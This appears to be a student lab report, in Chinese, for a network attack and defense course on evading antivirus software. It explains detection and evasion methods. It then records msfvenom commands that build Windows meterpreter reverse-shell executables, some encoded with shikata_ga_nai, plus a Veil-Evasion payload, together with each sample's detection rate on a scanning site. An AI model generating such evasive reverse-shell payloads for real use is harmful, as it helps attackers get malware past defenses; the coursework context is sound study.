20145338 索朗卓嘎 《网络攻防》 免杀原理与实践

20145338 索朗卓嘎《网络攻防》 免杀原理与实践

实践内容：

(1)理解免杀技术原理(1分)
(2)正确使用msf编码器，veil-evasion，本身利用shellcode编程等免杀工具或技巧；(2分)
(3)经过组合应用各类技术实现恶意代码免杀(1分)
(4)用另外一电脑实测，在杀软开启的状况下，可运行并回连成功，注明电脑的杀软名称与版本（1分）

报告内容：

`基础问题回答

（1）杀软是如何检测出恶意代码的？
根据特征来检测：对已存在的流行代码特征的提取与比对
根据行为来检测：是否有更改注册表行为、是否有设置自启动、是否有修改权限等等
（2）免杀是作什么？
免杀顾名思义就是免除计算机杀软的查杀。
经过一些手段来瞒过杀软的检测扫描。
（3）免杀的基本方法有哪些？
加花指令：就是加入一些花里胡哨的指令来迷惑杀软，让杀软检测不到特征码，好比+1，-1，*1，/1什么的，可是一些厉害的杀软还能够看破这些。
加壳：就是给含有恶意代码的程序加一个外包装，让杀软不知道里面装的是什么。可是这种方法逃不过内存查杀，一运行起来就会露出马脚。
修改特征码：就是在不影响程序功能的状况下，将杀软检测的那一段特征码改一下，从而瞒过杀软的检测。固然修改特征码不是一个容易的事情，可是倒是惟一能够躲过内存查杀的办法。
`实践体会
作实验老是几经波折，谢谢在实验过程当中不不厌其烦耐心帮助个人同窗。经过此次实验了解了几种免杀技术，实验中使用了不少种杀毒软件，但可以真正杀毒成功的却只有几个，因此平时在使用电脑的时候真须要谨慎，不点开不明连接以及在正规网站下载软件，不能过度依赖杀毒软件，本身日常中也要多加注意。

实践过程

·首先使用msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.164 PORT=5338-f exe > slzgtest.exe生成meterpreter可执行文件。

接着利用http://www.virscan.org/这个网站检测一下有多少查毒软件能够将其查杀出来，发现39个杀毒软件中有21能够发现病毒。

·Msfvenom使用编码器生成meterpreter可执行文件
使用msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b ‘\x00’ LHOST=192.168.43.164 LPORT= 5338-f exe > sltest.exe命令生成编码过的可执行文件sltest.exe。

上传生成的可执行文件sltest.exe，发现39个杀毒软件其中20个软件发现有病毒.

使用msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=192.168.43.164 LPORT=5338 -f exe >slzg2.exe命令生成编码过的可执行文件slzg23test.exe


发如今39个杀毒软件中有22个软件发现有病毒.
·使用Veil-Evasion生成可执行文件
在kali中输入指令veil-evasion 进入Veil-Evasion
用python语言来编写。


在kali计算机的/var/lib/veil-evasion/output/compiled/文件夹里找到db.exe的文件夹，而且移动至win系统中。

经过上传软件发现39个杀毒软件中只有9个软件发现有病毒，相对于以前使用的两个方法相比这个的免杀效果更好。